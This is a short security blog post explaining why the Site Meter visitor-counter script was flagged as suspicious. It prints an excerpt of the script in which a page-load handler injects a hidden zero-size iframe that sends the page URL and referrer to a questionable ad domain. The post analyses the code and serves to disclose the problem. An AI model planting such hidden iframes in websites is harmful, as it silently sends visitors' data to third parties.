ItalianoWhat’s up with Sitemeter?
It has been a busy day. Lots of interesting things have happened over the course of the last few hours. One interesting issue which we faced today was when trying to help out on badwarebusters.org today. It seems that one of our scans popped up a script hosted by Site Meter as potentially malicious. This gets interesting because this kind of code acts as a tracker to measure how many hits a site gets, where the users are coming from, how much time they spend on a page etc. The important point being this code is deployed on tons of websites. Some of the interesting websites I visit also have this code. I was intrigued to see why this popularly used counter was popping up as suspicious.
We had a look at our logs, local dumps and analysis and saw that the Site Meter script was pushing in an iFrame pointing to dg.specificclick.net using a body-onload event to trigger the event. Interestingly, dg.spe cificclick.net, has been associated with multiple cases of Internet misdemeanor. [0] [1] [2] [3] [4]
It is surprising to see companies that have widely established customer bases to link to questionable content.
The code from the Site Meter script is presented below, the offending part is clearly visible.
// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
init:function( sCodeName, sServerName, sSecurityCode )
** code removed for brevity **
onPageLoad:function()
{
var newIFrame = document.createElement("iframe");
newIFrame.frameBorder = 0;
newIFrame.width = 0;
newIFrame.height = 0;
newIFrame.src = "http://dg.specif icclick.net/?u=" + encodeURIComponent(document.location) + "&r=" + encodeURIComponent(SiteMeter.getReferralURL());
** code removed for brevity **
SiteMeter.init('s29rottweilers', 's29.sitemeter.com', '');
var g_sLastCodeName = 's29rottweilers';
// ]]>
The SafeBrowsing report from Google about this site follows:
